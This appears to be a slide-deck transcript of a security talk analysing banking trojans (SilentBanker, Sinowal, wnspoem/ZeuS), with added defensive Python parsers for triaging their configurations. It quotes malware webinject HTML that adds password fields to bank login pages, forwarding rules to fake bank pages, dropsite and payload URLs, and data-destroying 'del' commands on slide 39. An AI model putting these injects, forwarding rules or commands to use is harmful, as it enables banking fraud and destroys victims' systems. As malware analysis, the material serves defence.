    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
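A responder who finds a registration like the one on slide 9 has to walk from the Browser Helper Objects key to the CLSID's InprocServer32 entry to learn which DLL Internet Explorer will actually load. The Python below is an added example, not code from the talk or from S21sec: it parses a constructed .reg export modelled on slide 9 (CLSID and DLL name as shown there, backslashes restored) and resolves every registered BHO to its DLL, so that anything outside an analyst-supplied allow-list (a hypothetical input) stands out.

```python
"""Resolve Browser Helper Object registrations in a .reg export to the DLL each one loads."""
import os
from typing import Dict, List, Tuple

# Constructed sample export modelled on slide 9. A .reg file doubles backslashes
# inside string values, which is why the DLL path below reads "C:\\WINDOWS\\...".
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
@="Microsoft Shared Library Object Version"

[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\InprocServer32]
@="C:\\WINDOWS\\system32\\mfc42dx1.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
'''

# Lower-cased fragment of the key under which IE enumerates BHOs; the trailing
# backslash makes sure only the per-CLSID subkeys match, not the parent key.
BHO_KEY_FRAGMENT = "\\microsoft\\windows\\currentversion\\explorer\\browser helper objects\\"


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key path (lower-cased): {value name: string value}}.

    Only REG_SZ values ("..." syntax) are kept, which is all the BHO lookup needs.
    Key paths are lower-cased because the registry is case-insensitive.
    """
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, _, value = line.partition("=")
            name = "@" if name == "@" else name.strip('"')
            if value.startswith('"') and value.endswith('"'):
                # Undo .reg escaping: \\ becomes \ and \" becomes "
                value = value[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            keys[current][name] = value
    return keys


def list_bhos(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (CLSID, display name, DLL path) for every BHO registered in the export."""
    found = []
    for path in keys:
        if BHO_KEY_FRAGMENT not in path:
            continue
        clsid = path.rsplit("\\", 1)[1]
        name = keys.get(f"hkey_classes_root\\clsid\\{clsid}", {}).get("@", "")
        dll = keys.get(f"hkey_classes_root\\clsid\\{clsid}\\inprocserver32", {}).get("@", "")
        found.append((clsid.upper(), name, dll))
    return found


def unexpected_bhos(bhos: List[Tuple[str, str, str]], allowed_dlls) -> List[Tuple[str, str, str]]:
    """BHOs whose DLL file name is not in the analyst's allow-list (hypothetical input)."""
    return [
        b for b in bhos
        if os.path.basename(b[2].replace("\\", "/")).lower() not in allowed_dlls
    ]


if __name__ == "__main__":
    for clsid, name, dll in list_bhos(parse_reg(SAMPLE_REG)):
        print(f"{clsid}  {name!r}  ->  {dll}")
```

On a live system the same walk is done against HKLM\Software\Classes as well as HKEY_CLASSES_ROOT, and a display name such as "Microsoft Shared Library Object Version" is exactly the kind of generic label that should prompt a look at the DLL's signature and on-disk age rather than reassure.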
  • 10. SilentBanker: Configuration File
    Get X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=6&z=12705442
  • 11. SilentBanker: Configuration File
    The encrypted configuration file includes:
    • Additional configuration sources
    • Dropsite URL
    • Update URL
    • Data encryption key

    [dfgdf]
    Bg1=X.Y.67.30/~ipcount/ww6/getcfg.php
    Bg2=A.B.100.103/ww6/getcfg.php
    [nbmx]
    Bg1=X.Y.67.30/~ipcount/ww6/data.php
    Bg2=A.B.100.103/ww6/data.php
    [kjew]
    Bg1=X.Y.67.30/~ipcount/ww6/file.exe
    Bg2=A.B.100.103/ww6/file.exe
    [sdfs]
    secd=08000000B7B613F1F56F5BC7EDAEDEEFD2ABB1D38B2BA1014A585…
  • 12. SilentBanker: Injection Configuration
    Get X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442

    Field legend:
    pok  Action
    qas  Target URL
    njd  Begin replacement token
    dfr  Number of characters in njd -1
    xzn  End replacement token
    xzq  Number of characters in xzn -1
    rek  HTML code injected
    req  Number of characters in rek -1

    Actions:
    insert   insert injected HTML code between tokens
    delete   delete HTML code in xzn
    replace  replace HTML code in xzn
    subreq   substitute xzn with rek
    grab     extract field in xzn

    [jhw18]
    pok=insert
    qas=passport.yandex.ru/passport
    njd=3ECFE0F0EEEBFC3A3C28
    dfr=9
    xzn=3C2367653E69
    xzq=5
    rek=202020203C676520696E797674612122676263223E0D0A202020203223ECFEBE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206A767167752122292431222070796E666621227661636867223E0D0A202020203C766163686720676C63722122636E66666A6265712220616E7A722122636E66666…
    req=331
  • 13. SilentBanker: Injection Configuration
    <ge inyvta!"gbc">
    <gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq>
    <gq jvqgu!"%+1" pynff!"ynory">Платежный пароль:<#gq>
    <gq jvqgu!")$1" pynff!"vachg">
    <vachg glcr!"cnffjbeq" anzr!"cnffjq&" inyhr!"" fglyr!"jvqgu:)$1" gnovaqrk!"&">2aofc;2aofc;<oe#>
    <#gq>
    <gq jvqgu!"&)1"><oe><#gq>
    <#ge>

    ROT-13 Algorithm

    <tr valign="top">
    <td width="8%"><div style="width: 40px;"><br /></div></td>
    <td width="17%" class="label">Платежный пароль:</td>
    <td width="50%" class="input">
    <input type="password" name="passwd2" value="" style="width:50%" tabindex="2">&nbsp;&nbsp;<br/>
    </td>
    <td width="25%"><br></td>
    </tr>
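To make the slide 12 legend and the slide 13 decoding step concrete, here is an added Python example (not code from the talk or from S21sec) that parses one injection record, checks the dfr/xzq/req counters against the decoded token lengths, and deobfuscates the tokens. The njd, xzn, dfr and xzq values are the ones shown on slide 12; the rek value is a short ROT-13'd HTML fragment constructed for this example, since the real one runs to several hundred bytes. The example assumes plain ROT-13 on ASCII letters (as slide 13 labels it) and cp1251 for the Cyrillic label; the symbol remapping visible on slide 13 (for example "!" standing for "=") is a custom step that is not reproduced here.

```python
"""Decode one SilentBanker HTML-injection record using the field meanings from slide 12."""
import configparser

# Slide 12 legend: which configuration key carries what.
FIELDS = {
    "pok": "action", "qas": "target URL",
    "njd": "begin replacement token", "dfr": "len(njd) - 1",
    "xzn": "end replacement token", "xzq": "len(xzn) - 1",
    "rek": "injected HTML", "req": "len(rek) - 1",
}
ACTIONS = {"insert", "delete", "replace", "subreq", "grab"}

# Constructed sample: njd/xzn/dfr/xzq are the values shown on slide 12; rek is a
# short ROT-13'd HTML fragment made up for this example.
INJECTED_ROT13 = "<ge><gq>Cnlzrag cnffjbeq:</gq></ge>"
SAMPLE_CONFIG = f"""[jhw18]
pok=insert
qas=passport.yandex.ru/passport
njd=3ECFE0F0EEEBFC3A3C28
dfr=9
xzn=3C2367653E69
xzq=5
rek={INJECTED_ROT13.encode("ascii").hex().upper()}
req={len(INJECTED_ROT13) - 1}
"""


def deobfuscate(hex_value: str) -> str:
    """Hex-decode, ROT-13 the ASCII letters, then decode the bytes as cp1251.

    Non-letter bytes (the cp1251 Cyrillic label, punctuation) pass through unchanged.
    """
    raw = bytes.fromhex(hex_value)
    rotated = bytes(
        (b - 65 + 13) % 26 + 65 if 65 <= b <= 90 else
        (b - 97 + 13) % 26 + 97 if 97 <= b <= 122 else b
        for b in raw
    )
    return rotated.decode("cp1251")


def parse_inject(config_text: str, section: str) -> dict:
    """Return the decoded record, refusing records whose counters do not match."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(config_text)
    rec = cp[section]
    if rec["pok"] not in ACTIONS:
        raise ValueError(f"unknown action {rec['pok']!r}")
    # Each counter must equal the decoded token length minus one (slide 12); a mismatch
    # means the record was truncated or tampered with, so do not interpret it.
    for hex_key, count_key in (("njd", "dfr"), ("xzn", "xzq"), ("rek", "req")):
        decoded_len = len(bytes.fromhex(rec[hex_key]))
        if int(rec[count_key]) != decoded_len - 1:
            raise ValueError(
                f"{count_key}={rec[count_key]} but {hex_key} decodes to {decoded_len} bytes"
            )
    return {
        "action": rec["pok"],
        "target": rec["qas"],
        "begin_token": deobfuscate(rec["njd"]),
        "end_token": deobfuscate(rec["xzn"]),
        "html": deobfuscate(rec["rek"]),
    }


def is_consistent(config_text: str, section: str) -> bool:
    """True when the record parses and its counters agree with the decoded lengths."""
    try:
        parse_inject(config_text, section)
        return True
    except ValueError:
        return False


def decode_sample() -> dict:
    return parse_inject(SAMPLE_CONFIG, "jhw18")


if __name__ == "__main__":
    for key, value in decode_sample().items():
        print(f"{key:12} {value!r}")
```

Decoding njd this way yields the page fragment ">Пароль:<(" (the begin token sits just after a Russian "Password" label), which is how an analyst confirms from the configuration alone which form field the injected block is appended to.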
  • 16. Sinowal/Anserin/Torpig
    Date: 2005
    Method: Code Injection
    Technique: Real-time HTML injection and HTML forwarding
    Infection: drive-by exploits and email
    Misc: infects the Master Boot Record (MBR) to stay stealthy
  • 17. Sinowal: Injection
    Sinowal does not have a configuration file with details about all the injections.
    Each time the user connects to a specific site, Sinowal asks its injection server for instructions.
  • 18. Sinowal: Injection Example
    GET host/Key/EncryptedData
    GET host/EFAAC5AEB85FF1D1/MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1
    Callouts on the slide: "I want the answer encrypted" (the Key), "This is the targeted brand" (the EncryptedData), "Tell me the fake page path" (the purpose of the request)
  • 19. Sinowal: Injection Example
    Step 3: The injection server looks for the targeted brand:
    UK   online*.lloydstsb.*         /miheld.ibc                     {www}  /uk/lloyds/lloyds.php                 2 0 4
    USA  onlineid.bankofamerica.com  /cgi-bin/sso.login.controller*  {www}  /usa/bofa_pers/sso.login.php          2 0 3
    ES   www*.bancopopular.es        /Bpemotor                       {www}  /spain/bancopopular/bancopopular.php  2 0 2
  • 20. Sinowal: Injection Example
    Step 4: the injection server answers:
    www*.bancopopular.es /Bpemotor /spain/bancopopular/bancopopular.php 2 0 5 1
    Callouts on the slide: "www*.bancopopular.es /Bpemotor" is the real URL; "/spain/bancopopular/bancopopular.php" is the fake page path; "2: You need a GET to enable it"; "0: Number of injection attempts"; "5: Number of visits"; "1: Injection enabled"
  • 21. Sinowal: Targeted URLs
    HTTP Forwarding (Web Injects), targeted URLs per country:
    • PL: 7
    • AU: 26
    • UK: 40
    • SK: 5
    • DE: 47
    • NZ: 8
    • US: 65
    • NL: 4
    • ES: 30
    • SG: 2
    • IT: 18
    • AT: 7
    • TR: 44
  • 22. Wnspoem/PRG/ZeuS/Ntos
    Date: 2006
    Method: Code Injection
    Technique: Real-time HTML injection and HTML forwarding
    Infection: drive-by exploits

                   Version 1   Version 2      Version 3   Version 4
    Directory      wnspoem     sysproc64      twain_32    lowsec
    Filename       ntos.exe    oembios.exe    twext.exe   sdra64.exe
    Stolen data    audio.dll   sysproc86.sys  local.ds    local.ds
    Configuration  video.dll   sysproc32.sys  user.ds     user.ds
  • 25. Wnspoem: Hooks
    Wsock32.dll (FTP/POP3 capture): Send, Sendto, Closesocket
    Ws2_32.dll (FTP/POP3): Send, Sendto, WSASend, WSASendTo, Closesocket
    User32.dll (Keylogger): GetMessage, PeekMessage, GetClipboardData
    Wininet.dll (Capture data, inject HTML): HTTPSendRequest, InternetReadFile, InternetReadFileEx, InternetQueryDataAvailable, InternetCloseHandle, HTTPQueryInfo
    Ntdll.dll (Infect processes and hide files): NtCreateThread, LdrLoadDll, LdrGetProcedureAddress, NtQueryDirectoryFile
    Crypt32.dll (Certificates): PFXImportCertStore
  • 26. Wnspoem: Configuration File
    Configuration files in the latest wnspoem version use RC4 with 256-bit keys.
    set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP
    data_before
    name="password"*</td>*</td>
    data_end
    data_inject
    <td align="left" colspan="7" valign="bottom"></td></tr><tr>
    <td class="textoHome" align="left">3. Clave de Transferencias</td>
    <td width="20"><img src='/img4bog/px.gif' border='0' width="20" height="1"></td>
    <td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3" class="TextoContenido"></td>
    data_end
    data_after
    data_end
  • 29. Wnspoem: HTTP Forwarding
    Some banks use security tokens or a second authentication step more complex than a password.
    In this scenario, HTML injection is avoided and the user is forwarded to a fake web page, usually hosted on a compromised site.
  • 30. Wnspoem: HTTP Forwarding
    In the configuration file:
    @https://*.barclays.co.uk/*
    https://*.barclays.co.uk/*
    http://compromisedhost.com/img/commons/barclay/index.php
    @https://*.cajasur.es/*
    https://*.cajasur.es/*
    http://compromisedhost.com/img/commons/cajasur/index.php
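The webinject block on slide 26 and the forwarding entries on slide 30 are the two record types an analyst pulls out of a decrypted wnspoem configuration to answer "which of our URLs does this sample target, and how?". The Python below is an added example, not code from the talk or from S21sec: it parses both record types from a constructed configuration built from the entries on those two slides and reports, for each URL of interest, whether the sample would inject into it, forward it, or leave it alone. Assumptions: only "*" is a wildcard in the URL masks; a forwarding entry is read as the three-line layout shown on slide 30 ("@mask", the mask again, the fake URL); and the "GP" flags are taken as GET/POST, which the slide shows but does not explain.

```python
"""Parse wnspoem/ZeuS-style webinject and forwarding entries and check URLs against them."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class InjectRule:
    url_mask: str
    flags: str          # "GP" on slide 26; read here as GET/POST (assumption)
    before: str = ""    # data_before: anchor pattern in the real page, "*" is a wildcard
    inject: str = ""    # data_inject: HTML the sample adds after the anchor
    after: str = ""     # data_after: closing anchor, may be empty


@dataclass
class ForwardRule:
    url_mask: str
    fake_url: str


# Constructed sample assembled from the entries shown on slides 26 and 30.
SAMPLE_CONFIG = """\
set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP
data_before
name="password"*</td>*</td>
data_end
data_inject
<td align="left" colspan="7" valign="bottom"></td></tr><tr>
<td class="textoHome" align="left">3. Clave de Transferencias</td>
data_end
data_after
data_end

@https://*.barclays.co.uk/*
https://*.barclays.co.uk/*
http://compromisedhost.com/img/commons/barclay/index.php
@https://*.cajasur.es/*
https://*.cajasur.es/*
http://compromisedhost.com/img/commons/cajasur/index.php
"""


def parse_config(text: str) -> Tuple[List[InjectRule], List[ForwardRule]]:
    injects: List[InjectRule] = []
    forwards: List[ForwardRule] = []
    current, section, body = None, None, []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        if section is not None:
            # Inside data_before / data_inject / data_after: collect until data_end.
            if line == "data_end":
                setattr(current, section, "\n".join(body))
                section, body = None, []
            else:
                body.append(line)
        elif line.startswith("set_url "):
            _, mask, *flag = line.split(maxsplit=2)
            current = InjectRule(mask, flag[0] if flag else "")
            injects.append(current)
        elif line in ("data_before", "data_inject", "data_after") and current is not None:
            section = line[len("data_"):]
        elif line.startswith("@") and i + 2 < len(lines):
            # Forwarding entry: "@mask", the mask again, then the fake URL (slide 30 layout).
            forwards.append(ForwardRule(lines[i + 1].strip(), lines[i + 2].strip()))
            i += 2
        i += 1
    return injects, forwards


def mask_to_regex(mask: str) -> "re.Pattern[str]":
    """Only '*' is a wildcard in these masks; everything else is literal."""
    return re.compile("^" + ".*".join(re.escape(part) for part in mask.split("*")) + "$")


def classify(url: str, injects: List[InjectRule], forwards: List[ForwardRule]) -> List[Tuple[str, str]]:
    """Every rule that fires for the URL: ('forward', fake URL) or ('inject', mask); else ('clean', '')."""
    hits = [("forward", r.fake_url) for r in forwards if mask_to_regex(r.url_mask).match(url)]
    hits += [("inject", r.url_mask) for r in injects if mask_to_regex(r.url_mask).match(url)]
    return hits or [("clean", "")]


def triage_sample() -> Dict[str, List[Tuple[str, str]]]:
    injects, forwards = parse_config(SAMPLE_CONFIG)
    urls = [  # constructed URLs of interest
        "https://www.gruposantander.es/bog/sbi?ptns=acceso1",
        "https://ibank.barclays.co.uk/olb/auth",
        "https://www.example.org/login",
    ]
    return {u: classify(u, injects, forwards) for u in urls}


if __name__ == "__main__":
    for url, verdict in triage_sample().items():
        print(f"{url}: {verdict}")
```

Running the same classification over a bank's own login URLs against every configuration file in a collection is how the per-brand counts on slides 21 and 32 are produced, and the fake_url column is the list of hosts worth a takedown request.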
  • 32. Wnspoem: Statistics
    Analysis and statistics of configuration files: 750 configuration files (usually cfg.bin) were analyzed, covering only wnspoem versions 1, 2 and 3.
  • 33. Wnspoem: Top 10 TLD 33
  • 36. Wnspoem: Malicious IP Addresses 36
  • 38. Kill the Operating System
    It is getting more common that, just after the credentials are stolen, the operating system is remotely destroyed.
    This action makes the analysis more difficult, since it cannot be done remotely. The malicious code is not securely deleted from the system and can be recovered.
    One optimistic result is that the machine will be reformatted with a new and patched operating system.
  • 39. Kill the Operating System
    Nethell:
    • Deletes NTDETECT.COM and ntldr
    InfoStealer:
    • Deletes drivers\*.sys
    • Deletes some registry keys (HKLM\Microsoft\Windows NT\CurrentVersion\Winlogon: Shell = Explorer.exe)
    Wnspoem:
    • Deletes HKCU, HKLM\Software and HKLM\System
    Glacial Dracon:
    • del /A:S /Q /F C:\*.*
    • del /S /Q %SYSTEMROOT% %PROGRAMFILES%
  • 41. Summary
    Browser hijacking is actively used in fraud schemes.
    Targeted brands are all around the world.
    Currently, only Microsoft Windows users are affected (Internet Explorer and Firefox).
    Be suspicious if your browser is asking for too much information.
    Be more suspicious if your computer stops working just after your browser is asking for too much information ☺
  • 42. Thanks
    David Barroso, S21sec e-crime Director
    dbarroso@s21sec.com
    http://blog.s21sec.com
    lostinsecurity
  • 43. *[ THANK YOU VERY MUCH ]